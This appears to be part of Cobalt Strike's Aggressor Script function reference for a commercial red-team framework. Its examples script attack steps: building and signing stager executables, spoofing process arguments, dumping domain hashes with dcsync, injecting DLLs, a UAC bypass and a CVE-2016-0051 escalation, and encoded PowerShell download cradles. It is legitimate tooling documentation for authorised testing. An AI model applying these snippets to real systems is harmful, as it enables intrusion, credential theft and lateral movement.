Functions

This is a list of Aggressor Script’s functions 1-3

-isactive

Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.

Arguments

$1 - Beacon/Session ID

Example

command active {
   local('$bid');
   foreach $bid (beacon_ids()) {
      if (-isactive $bid) {
         println("$bid is active!");
      }
   }
}

-isadmin

Check if a session has admin rights

Arguments

$1 - Beacon/Session ID

Example

command admin_sessions {
   foreach $session (beacons()) {
      if (-isadmin $session['id']) {
         println($session);
      }
   }
}

-isbeacon

Check if a session is a Beacon or not.

Arguments

$1 - Beacon/Session ID

Example

command beacons {
   foreach $session (beacons()) {
      if (-isbeacon $session['id']) {
         println($session);
      }
   }
}

-isssh

Check if a session is an SSH session or not.

Arguments

$1 - Beacon/Session ID

Example

command ssh_sessions {
   foreach $session (beacons()) {
      if (-isssh $session['id']) {
         println($session);
      }
   }
}

-hasbootstraphint

Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it’s safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.

Arguments

$1 - byte array with a payload or shellcode.

See also

&payload_bootstrap_hint

-is64

Check if a session is on an x64 system or not (Beacon only).

Arguments

$1 - Beacon/Session ID

**Example**

command x64 {
   foreach $session (beacons()) {
      if (-is64 $session['id']) {
         println($session);
      }
   }
}

action

Post a public action message to the event log. This is similar to the /me command.

Arguments

$1 - the message

Example

action("dances!");

addTab

create a tab to display a GUI object.

Arguments

$1 - the title of the tab

$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent .

$3 - a tooltip to display when a user hovers over this tab.

Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

addVisualization

Register a visualization with Cobalt Strike.

Arguments

$1 - the name of the visualization

$2 - a javax.swing.JComponent object

Example

$label = [new javax.swing.JLabel: “Hello World!”];
addVisualization(“Hello World”, $label);

See also
&showVisualization

add_to_clipboard

Add text to the clipboard, notify the user.

Arguments

$1 - the text to add to the clipboard

Example
add_to_clipboard("Paste me you fool!");

alias

Creates an alias command in the Beacon console

Arguments

$1 - the alias name to bind to

$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.

Example

alias("foo", {
   btask($1, "foo!");
});

alias_clear

Removes an alias command (and restores default functionality; if it existed)

Arguments

$1 - the alias name to remove

Example

alias_clear("foo");

applications

Returns a list of application information in Cobalt Strike’s data model. These applications are results from the System Profiler.

Returns

An array of dictionary objects with information about each application.

Example

printAll(applications());

archives

Returns a massive list of archived information about your activity from Cobalt Strike’s data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike’s reports.

Returns

An array of dictionary objects with information about your team’s activity.

Example

foreach $index => $entry (archives()) {
   println("\c3( $+ $index $+ )\o $entry");
}

artifact

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - deprecated; this parameter no longer has any meaning.

$4 - x86|x64 - the architecture of the generated stager

Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_general

Generates a payload artifact from arbitrary shellcode.

Arguments

$1 - the shellcode

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload

Note
While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

artifact_payload

Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Example

$data = artifact_payload("my listener", "exe", "x86");

artifact_sign

Sign an EXE or DLL file

Arguments

$1 - the contents of the EXE or DLL file to sign

Notes

• This function requires that a code-signing certificate is specified in this server’s Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
• DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.

Returns

A scalar containing the signed artifact.

Example

# generate an artifact!
$data = artifact("my listener", "exe");

# sign it.
$data = artifact_sign($data);

# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_stageless

DEPRECATED This function is deprecated in Cobalt Strike 4.0.

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener

Arguments

$1 - the listener name (must be local to this team server)

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - proxy configuration string

$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.

Notes

• This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
• The proxy configuration string is the same string you would use with Attacks → Packages → Windows Executable (S) . *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http . Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
• This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listers with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
• Note: while the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Example

sub ready {
   local('$handle');
   $handle = openf(">out.exe");
   writeb($handle, $1);
   closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

artifact_stager

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated stager

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns
A scalar containing the specified artifact.

Example

$data = artifact_stager("my listener", "exe", "x86");
 
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

barch

Returns the architecture of your Beacon session (e.g., x86 or x64)

Arguments

$1 - the id for the beacon to pull metadata for

Note
If the architecture is unknown (e.g., a DNS Beacon that hasn’t sent metadata yet); this function will return x86.

Example
println("Arch is: " . barch($1));

bargue_add

This function adds an option to Beacon’s list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

$3 - the fake arguments to use when the specified command is run.

Notes

• The process match is exact. If Beacon tries to launch “net.exe”, it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
• x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
• The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.

Example

# spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");

# spoof net arguments
bargue_add($1, "net", "user guest /active:no");

bargue_list

List the commands + fake arguments Beacon will spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bargue_list($1);

bargue_remove

This function removes an option to Beacon’s list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

Example

# don't spoof cmd.exe
bargue_remove($1, "%COMSPEC%");

base64_decode

Unwrap a base64-encoded string

Arguments

$1 - the string to decode

Returns

The argument processed by a base64 decoder

Example

println(base64_decode(base64_encode("this is a test")));

base64_encode

Base64 encode a string

Arguments

$1 - the string to encode

Returns

The argument processed by a base64 encoder

Example
println(base64_encode("this is a test"));

bblockdlls

Launch child processes with binary signature policy that blocks non-Microsoft DLLs from loading in the process space.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - true or false; block non-Microsoft DLLs in child process

Note
This attribute is available in Windows 10 only.

Example

on beacon_initial {
   binput($1, "blockdlls start");
   bblockdlls($1, true);
}

bbrowser

Generate the beacon browser GUI component. Shows only Beacons.

Returns

The beacon browser GUI object (a javax.swing.JComponent )

Example

addVisualization("Beacon Browser", bbrowser());

See also
&showVisualization

bbrowserpivot

Start a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the browser pivot agent into.

$3 - the architecture of the target PID (x86|x64)

Example

bbrowserpivot($1, 1234, "x86");

bbrowserpivot_stop

Stop a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example
bbrowserpivot_stop($1);

bbypassuac

REMOVED Removed in Cobalt Strike 4.0.

bcancel

Cancel a file download

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to cancel or a wildcard.

Example

item "&Cancel Downloads" {
   bcancel($1, "*");
}

bcd

Ask a Beacon to change it’s current working directory.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to change to.

Example

# create a command to change to the user's home directory
alias home {
   $home = "c:\\users\\" . binfo($1, "user");
   bcd($1, $home);
}

bcheckin

Ask a Beacon to checkin. This is basically a no-op for Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Checkin" {
   binput($1, "checkin");
   bcheckin($1);
}

bclear

This is the “oops” command. It clears the queued tasks for the specified beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclear($1);

bconnect

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to connect to

$3 - [optional] the port to use. Default profile port is used otherwise.

Note
Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

bconnect($1, "DC");

bcovertvpn

Ask Beacon to deploy a Covert VPN client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the Covert VPN interface to deploy

$3 - the IP address of the interface [on target] to bridge into

$4 - [optional] the MAC address of the Covert VPN interface

Example

bcovertvpn($1, "phear0", "172.16.48.18");

bcp

Ask Beacon to copy a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to copy

$3 - the destination

Example
bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

bdata

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(bdata("1234"));

bdcsync

Use mimikatz’s dcsync command to pull a user’s password hash from a domain controller. This function requires a domain administrator trust relationship.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - fully qualified name of the domain

$3 - DOMAIN\user to pull hashes for (optional)

$4 - the PID to inject the dcsync command into or $null

$5 - the architecture of the target PID (x86|x64) or $null

Note
If $3 is left out, dcsync will dump all domain hashes.

Examples
Spawn a temporary process

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab");

Inject into the specified process

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");
 
# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");

bdesktop

Start a VNC session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Desktop (VNC)" {
   bdesktop($1); 
}

bdllinject

Inject a Reflective DLL into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the DLL into

$3 - the local path to the Reflective DLL

Example

bdllinject($1, 1234, script_resource("test.dll"));

bdllload

Call LoadLibrary() in a remote process with the specified DLL.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target process PID

$3 - the on-target path to a DLL

Note

The DLL must be the same architecture as the target process.

Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

bdllspawn

Spawn a Reflective DLL as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the Reflective DLL

$3 - a parameter to pass to the DLL

$4 - a short description of this post exploitation job (shows up in jobs output)

$5 - how long to block and wait for output (specified in milliseconds)

$6 - true/false; use impersonated token when running this post-ex job?

Notes

• This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
• A well-behaved Reflective DLL follows these rules:
  • Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
  • Prints messages to STDOUT
  • Calls fflush(stdout) to flush STDOUT
  • Calls ExitProcess(0) when done. This kills the spawned process to host the capability.

Example (ReflectiveDll.c)

This example is based on Stephen Fewer’s Reflective DLL Injection Project:

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
   BOOL bReturnValue = TRUE;
   switch( dwReason ) {
      case DLL_QUERY_HMODULE:
         if( lpReserved != NULL )
            *(HMODULE *)lpReserved = hAppInstance;
         break;
      case DLL_PROCESS_ATTACH:
         hAppInstance = hinstDLL;
   
         /* print some output to the operator */
         if (lpReserved != NULL) {
            printf("Hello from test.dll. 
            Parameter is '%s'\n", (char *)lpReserved);
         }
         else {
            printf("Hello from test.dll. There is no parameter\n");
         }

         /* flush STDOUT */
         fflush(stdout);

         /* we're done, so let's exit */
         ExitProcess(0);
         break;
      case DLL_PROCESS_DETACH:
      case DLL_THREAD_ATTACH:
      case DLL_THREAD_DETACH:
         break;
   }
   return bReturnValue;
}

Example (Aggressor Script)

alias hello {
   bdllspawn($1, script_resource("reflective_dll.dll"), $2, 
   "test dll", 5000, false);
}

bdownload

Ask a Beacon to download a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to request

Example

bdownload($1, "c:\\sysprep.inf");

bdrives

Ask Beacon to list the drives on the compromised system

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Drives" {
   binput($1, "drives");
   bdrives($1);
}

beacon_command_describe

Describe a Beacon command.

Returns

A string description of the Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_describe("ls"));

beacon_command_detail

Get the help information for a Beacon command.

Returns

A string with helpful information about a Beacon command.

Arguments

$1 - the command

Example
println(beacon_command_detail("ls"));

beacon_command_register

Register help information for a Beacon command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

alis echo {
   blog($1, "You typed: " . substr($1, 5));
}

beacon_command_register(
   "echo", 
   "echo text to beacon log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

beacon_commands

Get a list of Beacon commands.

Returns

An array of Beacon commands.

Example
printAll(beacon_commands());

beacon_data

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example
println(beacon_data("1234"));

beacon_elevator_describe

Describe a Beacon command elevator exploit

Returns

A string description of the Beacon command elevator

Arguments

$1 - the exploit

Example

println(beacon_elevator_describe("uac-token-duplication"));

See Also
&beacon_elevator_register, &belevate_command

beacon_elevator_register

Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)

Example

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
   local('$handle $script $oneliner $command');

   # acknowledge this command
   btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

   # read in the script
   $handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
   $script = readb($handle, -1);
   closef($handle);

   # host the script in Beacon
   $oneliner = beacon_host_script($1, $script);

   # base64 encode the command
   $command  = transform($2, "powershell-base64");

   # run the specified command via this exploit.
   bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);

See Also
[&beacon_elevator_describe],&belevate_command

beacon_elevators

Get a list of command elevator exploits registered with Cobalt Strike.

Returns

An array of Beacon command elevators

Example

printAll(beacon_elevators());

See also
[&beacon_elevator_describe], &belevate_command

beacon_execute_job

Run a command and report its output to the user.

Arguments

$1 - the Beacon ID

$2 - the command to run (environment variables are resolved)

$3 - the command arguments (environment variables are not resolved).

$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)

Notes

• The string $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
• This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
   local('$args');
   $args = substr($0, 6);
   btask($1, "Tasked beacon to run: $args", "T1059");
   beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

beacon_exploit_describe

Describe a Beacon exploit

Returns

A string description of the Beacon exploit

Arguments

$1 - the exploit

Example

println(beacon_exploit_describe("ms14-058"));

See Also
&beacon_exploit_register, &belevate

beacon_exploit_register

Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)

Example

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
   local('$stager');
   
   # check if we're on an x64 system and error out.
   if (-is64 $1) {
      berror($1, "ms16-016 exploit is x86 only");
      return;
   }

   # acknowledge this command
   btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

   # generate our shellcode
   $stager = payload($2, "x86");

   # spawn a Beacon post-ex job with the exploit DLL
   bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

   # link to our payload if it's a TCP or SMB Beacon
   beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

See Also
&beacon_exploit_describe, &belevate

beacon_exploits

Get a list of privilege escalation exploits registered with Cobalt Strike.

Returns

An array of Beacon exploits.

Example

printAll(beacon_exploits());

See also
&beacon_exploit_describe, &belevate

beacon_host_imported_script

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.

Arguments

$1 - the id of the Beacon to host this script with.

Returns
A short PowerShell script to download and evaluate the previously script when run. How this one-liner is used is up to you!

Example

alias powershell {
   local('$args $cradle $runme $cmd');
   
   # $0 is the entire command with no parsing.
   $args   = substr($0, 11);
   
   # generate the download cradle (if one exists) for an imported PowerShell script
   $cradle = beacon_host_imported_script($1);
   
   # encode our download cradle AND cmdlet+args we want to run
   $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
   
   # Build up our entire command line.
   $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
   
   # task Beacon to run all of this.
   btask($1, "Tasked beacon to run: $args", "T1086");
   beacon_execute_job($1, "powershell", $cmd, 1);
}

beacon_host_script

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.

Arguments

$1 - the id of the Beacon to host this script with.

$2 - the script data to host.

Returns

A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!

Example

alias test {
   local('$script $hosted');
   $script = "2 + 2";
   $hosted = beacon_host_script($1, $script);
   
   binput($1, "powerpick $hosted");
   bpowerpick($1, $hosted);
}

beacon_ids

Get the ID of all Beacons calling back to this Cobalt Strike team server.

Returns

An array of beacon IDs

Example

foreach $bid (beacon_ids()) {
   println("Bid: $bid");
}

beacon_info

Get information from a Beacon session’s metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns
A string with the requested information.

Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

beacon_inline_execute

Execute a Beacon Object File

Arguments

$1 - the id for the Beacon

$2 - a string containing the BOF file

$3 - the entry point to call

$4 - packed arguments to pass to the BOF file

Note
The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files .

Example (hello.c)

/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/

#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"

void demo(char * args, int length) {
   datap  parser;
   char * str_arg;
   int    num_arg;
   
   BeaconDataParse(&parser, args, length);
   str_arg = BeaconDataExtract(&parser, NULL);
   num_arg = BeaconDataInt(&parser);
   
   BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

Example (hello.cna)

alias hello {
   local('$barch $handle $data $args');

   # figure out the arch of this session
   $barch  = barch($1);

   # read in the right BOF file
   $handle = openf(script_resource("hello. $+ $barch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);

   # pack our arguments
   $args   = bof_pack($1, "zi", "Hello World", 1234);

   # announce what we're doing
   btask($1, "Running Hello BOF");
   
   # execute it.
   beacon_inline_execute($1, $data, "demo", $args);
}

See Also

&bof_pack

beacon_link

This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.

Arguments

$1 - the id of the beacon to link through

$2 - the target host to link to. Use $null for localhost.

$3 - the listener to link

Example

# smartlink [target] [listener name]
alias smartlink {
   beacon_link($1, $2, $3);
}

beacon_remote_exec_method_describe

Describe a Beacon remote execute method

Returns

A string description of the Beacon remote execute method.

Arguments

$1 - the method

Example

println(beacon_remote_exec_method_describe("wmi"));

See also
&beacon_remote_exec_method_register, &bremote_exec

beacon_remote_exec_method_register

Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.

Arguments

$1 - the method short name

$2 - a description of the method

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the command+args)

See Also
&beacon_remote_exec_method_describe, &bremote_exec

beacon_remote_exec_methods

Get a list of remote execute methods registered with Cobalt Strike.

Returns

An array of remote exec modules.

Example

printAll(beacon_remote_exec_methods());

See also
&beacon_remote_exec_method_describe, &bremote_exec

beacon_remote_exploit_arch

Get the arch info for this Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

x86 or x64

Example

println(beacon_remote_exploit_arch("psexec"));

See Also
&beacon_remote_exploit_register, &bjump

beacon_remote_exploit_describe

Describe a Beacon lateral movement option.

Returns

A string description of the Beacon lateral movement option.

Arguments

$1 - the exploit

Example

println(beacon_remote_exploit_describe("psexec"));

See Also
&beacon_remote_exploit_register, &bjump

beacon_remote_exploit_register

Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.

Arguments

$1 - the exploit short name

$2 - the arch associated with this attack (e.g., x86, x64)

$3 - a description of the exploit

$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)

See also

&beacon_remote_exploit_describe, &bjump

beacon_remote_exploits

Get a list of lateral movement options registered with Cobalt Strike.

Returns

An array of lateral movement option names.

Example

printAll(beacon_remote_exploits());

Continue Reading User Guide - Part 4 (Functions 2-3)